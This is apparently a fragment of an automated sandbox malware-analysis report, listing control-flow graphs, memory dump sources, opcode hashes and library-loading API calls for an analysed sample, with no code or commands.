540->566 545->559 546->559 547->548 551 7ffd9b8b4035 548->551 552 7ffd9b8b403c-7ffd9b8b4049 548->552 551->552 552->535 555 7ffd9b8b404b-7ffd9b8b408e 552->555 561 7ffd9b8b4097-7ffd9b8b40a3 555->561 562 7ffd9b8b4090-7ffd9b8b4095 555->562 565 7ffd9b8b40a5-7ffd9b8b40b9 561->565 562->565 569 7ffd9b8b4127-7ffd9b8b4143 565->569 570 7ffd9b8b40bb-7ffd9b8b4120 565->570 566->546 570->569
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd
      Similarity
      • API ID:
      • String ID: eY_H
      • API String ID: 0-200623403
      • Opcode ID: 67ccb4defa49f3013bbe24224f31e42331b263c9e179f3a49bb73fe31be9e43b
      • Instruction ID: f9a185bf93b5affadbb7faa16a0342f13623b1e161ec851b7eb0279fc182097a
      • Opcode Fuzzy Hash: 67ccb4defa49f3013bbe24224f31e42331b263c9e179f3a49bb73fe31be9e43b
      • Instruction Fuzzy Hash: F6022931B0D5894FEB59EB789865AB97BE1EF9A314F1400BEE049C31D7DE24A842C781

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 641 7ffd9b8b3268-7ffd9b8b44fc 644 7ffd9b8b4546 641->644 645 7ffd9b8b44fe-7ffd9b8b4529 641->645 646 7ffd9b8b4588-7ffd9b8b458b 644->646 647 7ffd9b8b4548-7ffd9b8b454b 644->647 648 7ffd9b8b452b-7ffd9b8b452e 645->648 649 7ffd9b8b4582-7ffd9b8b4586 645->649 654 7ffd9b8b45d5-7ffd9b8b461c 646->654 655 7ffd9b8b458d-7ffd9b8b45ad 646->655 650 7ffd9b8b45cc-7ffd9b8b45cd 647->650 651 7ffd9b8b454d-7ffd9b8b4561 647->651 652 7ffd9b8b45af-7ffd9b8b45b2 648->652 653 7ffd9b8b4530-7ffd9b8b4532 648->653 649->646 659 7ffd9b8b45cf 650->659 660 7ffd9b8b45d0-7ffd9b8b45d3 650->660 688 7ffd9b8b4568-7ffd9b8b456b call 7ffd9b8b3218 651->688 656 7ffd9b8b45b4-7ffd9b8b45b9 652->656 657 7ffd9b8b45ae 653->657 658 7ffd9b8b4534 653->658 667 7ffd9b8b46d8-7ffd9b8b46dc 654->667 668 7ffd9b8b4622-7ffd9b8b4652 654->668 664 7ffd9b8b45ba-7ffd9b8b45bb 656->664 657->652 665 7ffd9b8b4576-7ffd9b8b457b 658->665 666 7ffd9b8b4536-7ffd9b8b4538 658->666 659->660 660->654 671 7ffd9b8b45bd 664->671 672 7ffd9b8b45be 664->672 674 7ffd9b8b457c-7ffd9b8b4581 665->674 666->656 673 7ffd9b8b453a 666->673 669 7ffd9b8b4706-7ffd9b8b470a 667->669 670 7ffd9b8b46de-7ffd9b8b4705 call 7ffd9b8b3360 667->670 714 7ffd9b8b4659-7ffd9b8b466c call 7ffd9b8b31e0 668->714 679 7ffd9b8b470c-7ffd9b8b476f call 7ffd9b8b3370 669->679 680 7ffd9b8b4770-7ffd9b8b4774 669->680 670->669 671->672 678 7ffd9b8b45c0-7ffd9b8b45ca 672->678 673->674 681 7ffd9b8b453c-7ffd9b8b453e 673->681 678->650 679->680 683 7ffd9b8b477a-7ffd9b8b477e 680->683 684 7ffd9b8b485e-7ffd9b8b4862 680->684 681->664 687 7ffd9b8b4540 681->687 689 7ffd9b8b4eae-7ffd9b8b4ed5 683->689 690 7ffd9b8b4784-7ffd9b8b47a5 683->690 691 7ffd9b8b4868-7ffd9b8b486c 684->691 692 7ffd9b8b48fb-7ffd9b8b48ff 684->692 687->649 693 7ffd9b8b4542-7ffd9b8b4544 687->693 707 7ffd9b8b4570-7ffd9b8b4574 call 7ffd9b8b4582 688->707 696 7ffd9b8b4edc-7ffd9b8b4eed 689->696 710 7ffd9b8b47ab-7ffd9b8b47c4 690->710 711 7ffd9b8b4dbd-7ffd9b8b4fab call 7ffd9b8b50ad call 7ffd9b8b5102 call 7ffd9b8b5155 call 7ffd9b8b51a8 690->711 702 7ffd9b8b4d1b-7ffd9b8b4d42 691->702 703 7ffd9b8b4872-7ffd9b8b48a2 691->703 698 7ffd9b8b491c-7ffd9b8b4928 692->698 699 7ffd9b8b4901-7ffd9b8b4918 692->699 693->644 693->678 708 7ffd9b8b4eef 696->708 709 7ffd9b8b4ef4-7ffd9b8b4fe8 call 7ffd9b8b33a0 call 7ffd9b8b5102 call 7ffd9b8b5155 call 7ffd9b8b51a8 696->709 715 7ffd9b8b492d-7ffd9b8b4940 698->715 699->698 706 7ffd9b8b4d49-7ffd9b8b4d5a 702->706 704 7ffd9b8b48a9-7ffd9b8b48d3 call 7ffd9b8b31e8 703->704 705 7ffd9b8b48a4 703->705 721 7ffd9b8b48d8-7ffd9b8b48f8 704->721 705->704 716 7ffd9b8b4d5c 706->716 717 7ffd9b8b4d61-7ffd9b8b4d6c 706->717 707->665 708->709 800 7ffd9b8b4feb-7ffd9b8b502b 709->800 813 7ffd9b8b5032-7ffd9b8b503f 711->813 733 7ffd9b8b4671-7ffd9b8b4684 714->733 723 7ffd9b8b49bd-7ffd9b8b49d0 715->723 724 7ffd9b8b4942-7ffd9b8b4c33 715->724 716->717 727 7ffd9b8b4d6e-7ffd9b8b4e66 call 7ffd9b8b50ad 717->727 728 7ffd9b8b4d82-7ffd9b8b4d97 717->728 721->692 731 7ffd9b8b4a0e-7ffd9b8b4a28 call 7ffd9b8b32b8 723->731 732 7ffd9b8b49d2-7ffd9b8b49db 723->732 770 7ffd9b8b4c3a-7ffd9b8b4c4d 724->770 727->696 817 7ffd9b8b4e68-7ffd9b8b4fd6 call 7ffd9b8b3340 call 7ffd9b8b5102 call 7ffd9b8b5155 call 7ffd9b8b51a8 727->817 747 7ffd9b8b4d99-7ffd9b8b4d9a 728->747 748 7ffd9b8b4da1-7ffd9b8b4dbc 728->748 753 7ffd9b8b4a2d-7ffd9b8b4a33 731->753 739 7ffd9b8b49ed-7ffd9b8b4a04 732->739 740 7ffd9b8b49dd-7ffd9b8b49e3 732->740 759 7ffd9b8b4686-7ffd9b8b469a call 7ffd9b8b32a8 733->759 739->731 768 7ffd9b8b4a06-7ffd9b8b4a07 739->768 740->739 747->748 748->711 761 7ffd9b8b4a35-7ffd9b8b4a6c call 7ffd9b8a1b30 753->761 762 7ffd9b8b4a6e-7ffd9b8b4a81 753->762 776 7ffd9b8b469f-7ffd9b8b46ba 759->776 761->762 811 7ffd9b8b4a91-7ffd9b8b4aaa call 7ffd9b8b3390 761->811 766 7ffd9b8b4a87-7ffd9b8b4a8c call 7ffd9b8b3380 762->766 767 7ffd9b8b4c98-7ffd9b8b4ca7 762->767 766->767 777 7ffd9b8b4ca9 767->777 778 7ffd9b8b4cae-7ffd9b8b4cd3 767->778 768->731 770->698 779 7ffd9b8b4c53-7ffd9b8b4c5c 770->779 776->800 801 7ffd9b8b46c0-7ffd9b8b46d7 call 7ffd9b8b3350 776->801 777->778 778->706 797 7ffd9b8b4cd5-7ffd9b8b4fcc call 7ffd9b8b3340 call 7ffd9b8b50ad call 7ffd9b8b5102 call 7ffd9b8b5155 call 7ffd9b8b51a8 778->797 787 7ffd9b8b4c6e-7ffd9b8b4c85 779->787 788 7ffd9b8b4c5e-7ffd9b8b4c64 779->788 787->698 805 7ffd9b8b4c8b-7ffd9b8b4c93 787->805 788->787 797->813 800->813 801->667 805->698 811->698 822 7ffd9b8b4ab0-7ffd9b8b4ad8 811->822 817->813 830 7ffd9b8b4ada-7ffd9b8b4b1b call 7ffd9b8b3340 822->830 831 7ffd9b8b4b4e-7ffd9b8b4b61 822->831 830->831 850 7ffd9b8b4dd3-7ffd9b8b4ddb call 7ffd9b8b50ad 830->850 834 7ffd9b8b4b9f-7ffd9b8b4bc4 831->834 835 7ffd9b8b4b63-7ffd9b8b4b6c 831->835 834->770 845 7ffd9b8b4bc6-7ffd9b8b4c07 call 7ffd9b8b3340 834->845 838 7ffd9b8b4b7e-7ffd9b8b4b95 835->838 839 7ffd9b8b4b6e-7ffd9b8b4b74 835->839 838->834 853 7ffd9b8b4b97-7ffd9b8b4b98 838->853 839->838 863 7ffd9b8b4de0-7ffd9b8b4de8 call 7ffd9b8b50ad 845->863 862 7ffd9b8b4f29-7ffd9b8b4f31 call 7ffd9b8b5102 850->862 850->863 853->834 872 7ffd9b8b4f33-7ffd9b8b4f3b call 7ffd9b8b5102 862->872 873 7ffd9b8b4f71-7ffd9b8b4f79 call 7ffd9b8b5155 862->873 863->872 878 7ffd9b8b4f7b-7ffd9b8b4f83 call 7ffd9b8b5155 872->878 873->878 879 7ffd9b8b4fb0-7ffd9b8b4fb8 call 7ffd9b8b51a8 873->879 884 7ffd9b8b4fba-7ffd9b8b4fc2 call 7ffd9b8b51a8 878->884 879->813 879->884 884->813
      Memory Dump Source
      • Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9e4c24f8ecc564a7738b2d3f8a6d66aed66e6b9e72c3eeee484647423c683a26
      • Instruction ID: 4d7dc571ddaa1be5a9be16e32938b86ac0bb8b928fb7eb57557b1ce491750f08
      • Opcode Fuzzy Hash: 9e4c24f8ecc564a7738b2d3f8a6d66aed66e6b9e72c3eeee484647423c683a26
      • Instruction Fuzzy Hash: 4F825030B0995E8FEB98EF68C461BAA73A1FF58300F554179D41EC7296CE34E942CB81

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 1243 7ffd9b8a3078-7ffd9b8a47d7 call 7ffd9b8a3168 1247 7ffd9b8a47d9-7ffd9b8a47df 1243->1247 1248 7ffd9b8a47e1-7ffd9b8a47f1 1243->1248 1249 7ffd9b8a47f3-7ffd9b8a47f7 1247->1249 1248->1249 1250 7ffd9b8a47f9 1249->1250 1251 7ffd9b8a486b-7ffd9b8a4876 1249->1251 1253 7ffd9b8a4af3-7ffd9b8a4b27 call 7ffd9b8a4010 call 7ffd9b8a3190 1250->1253 1252 7ffd9b8a487c 1251->1252 1251->1253 1254 7ffd9b8a47fe-7ffd9b8a4825 call 7ffd9b8a45d0 1252->1254 1280 7ffd9b8a4b2e-7ffd9b8a4b3d 1253->1280 1260 7ffd9b8a4827-7ffd9b8a4831 1254->1260 1261 7ffd9b8a487e-7ffd9b8a4886 1254->1261 1263 7ffd9b8a4837-7ffd9b8a484c 1260->1263 1264 7ffd9b8a4a90-7ffd9b8a4aa0 1260->1264 1265 7ffd9b8a4888 1261->1265 1266 7ffd9b8a488b-7ffd9b8a4895 1261->1266 1268 7ffd9b8a4aa7-7ffd9b8a4ab2 1263->1268 1269 7ffd9b8a4852 1263->1269 1264->1268 1265->1266 1270 7ffd9b8a4897-7ffd9b8a48a0 1266->1270 1271 7ffd9b8a48a2-7ffd9b8a48a6 1266->1271 1272 7ffd9b8a4ab8-7ffd9b8a4aec call 7ffd9b8a4058 call 7ffd9b8a3190 1268->1272 1274 7ffd9b8a4857-7ffd9b8a486a 1268->1274 1269->1272 1273 7ffd9b8a48ab-7ffd9b8a48ae 1270->1273 1271->1273 1272->1253 1277 7ffd9b8a4965-7ffd9b8a496b 1273->1277 1278 7ffd9b8a48b4-7ffd9b8a48c1 1273->1278 1277->1280 1281 7ffd9b8a4971 1277->1281 1282 7ffd9b8a4976-7ffd9b8a4985 1278->1282 1283 7ffd9b8a48c7-7ffd9b8a48d2 1278->1283 1290 7ffd9b8a4b89-7ffd9b8a4b98 1280->1290 1281->1278 1284 7ffd9b8a48d4-7ffd9b8a48db 1282->1284 1283->1284 1287 7ffd9b8a498a-7ffd9b8a4995 1284->1287 1288 7ffd9b8a48e1-7ffd9b8a4905 call 7ffd9b8a3088 call 7ffd9b8a45d0 1284->1288 1294 7ffd9b8a4997 1287->1294 1295 7ffd9b8a4920-7ffd9b8a4923 1287->1295 1309 7ffd9b8a499c-7ffd9b8a49ae 1288->1309 1310 7ffd9b8a490b-7ffd9b8a490f 1288->1310 1297 7ffd9b8a4be4-7ffd9b8a4cc1 call 7ffd9b8a4058 call 7ffd9b8a3190 1290->1297 1294->1288 1298 7ffd9b8a4929-7ffd9b8a494b 1295->1298 1299 7ffd9b8a49cd-7ffd9b8a49e7 call 7ffd9b8a3080 1295->1299 1298->1299 1316 7ffd9b8a4951-7ffd9b8a4960 call 7ffd9b8a45d0 1298->1316 1311 7ffd9b8a49ec-7ffd9b8a4a2a call 7ffd9b8a4420 call 7ffd9b8a45d0 1299->1311 1314 7ffd9b8a4911-7ffd9b8a4915 1309->1314 1310->1314 1328 7ffd9b8a4a37-7ffd9b8a4a3b 1311->1328 1329 7ffd9b8a4a2c-7ffd9b8a4a35 1311->1329 1318 7ffd9b8a491b 1314->1318 1319 7ffd9b8a49b3-7ffd9b8a49be 1314->1319 1316->1260 1318->1290 1319->1290 1323 7ffd9b8a49c4-7ffd9b8a49c7 1319->1323 1323->1298 1323->1299 1331 7ffd9b8a4a40-7ffd9b8a4a43 1328->1331 1329->1331 1332 7ffd9b8a4a45-7ffd9b8a4a4b 1331->1332 1333 7ffd9b8a4a51-7ffd9b8a4a5b 1331->1333 1332->1260 1332->1333 1335 7ffd9b8a4a68-7ffd9b8a4a6c 1333->1335 1336 7ffd9b8a4a5d-7ffd9b8a4a66 1333->1336 1338 7ffd9b8a4a71-7ffd9b8a4a74 1335->1338 1336->1338 1338->1297 1340 7ffd9b8a4a7a-7ffd9b8a4a85 1338->1340 1340->1297 1342 7ffd9b8a4a8b 1340->1342 1342->1254
      Memory Dump Source
      • Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fbea5dbe3cca14f92981de28e7d4d6c727fa344ca05fce706f2397436d509838
      • Instruction ID: 1adcf1dd2428bc912695a63ffc7e09587a11da973307c75c4393dec12698f44a
      • Opcode Fuzzy Hash: fbea5dbe3cca14f92981de28e7d4d6c727fa344ca05fce706f2397436d509838
      • Instruction Fuzzy Hash: 53E15721F0D65E4EEBB897A98461239B7C1EF89311F5A117DE48EC31E2DF2CA9438351

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 579 7ffd9b8aa1d4-7ffd9b8aa1db 580 7ffd9b8aa1e6-7ffd9b8aa24f 579->580 581 7ffd9b8aa1dd-7ffd9b8aa1e5 579->581 584 7ffd9b8aa259-7ffd9b8aa28b LoadLibraryExW 580->584 585 7ffd9b8aa251-7ffd9b8aa256 580->585 581->580 586 7ffd9b8aa28d 584->586 587 7ffd9b8aa293-7ffd9b8aa2ba 584->587 585->584 586->587
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 12209e2f61c59d064f08ce8a5c2394a058c7b1201ac3c77ba0d1589ffc2436e7
      • Instruction ID: 9869c286b3b3123d92ee266033495a5ececf74c43202260a68c9b0749e84a813
      • Opcode Fuzzy Hash: 12209e2f61c59d064f08ce8a5c2394a058c7b1201ac3c77ba0d1589ffc2436e7
      • Instruction Fuzzy Hash: 7A31043190CB4D9FDB59DBA89845AE9BBE0FF59320F00822BD009C3552DB74A416CB91

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 589 7ffd9b8a9c0a-7ffd9b8aa24f 592 7ffd9b8aa259-7ffd9b8aa28b LoadLibraryExW 589->592 593 7ffd9b8aa251-7ffd9b8aa256 589->593 594 7ffd9b8aa28d 592->594 595 7ffd9b8aa293-7ffd9b8aa2ba 592->595 593->592 594->595
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.4129334493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_otis.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 0d76d902b6d074e4e4c53937c7df047effd1ce4a4e9d48061ac439211fbdf597
      • Instruction ID: ae7e4cb4ce64cc4a28c871155d3c0dce26d5a6f1a578bfadfa7e445723bf2464
      • Opcode Fuzzy Hash: 0d76d902b6d074e4e4c53937c7df047effd1ce4a4e9d48061ac439211fbdf597
      • Instruction Fuzzy Hash: 0021D231908A1C9FDB58DF9CD849BF9BBE0FB59320F00822ED009D3651DB71A4168B90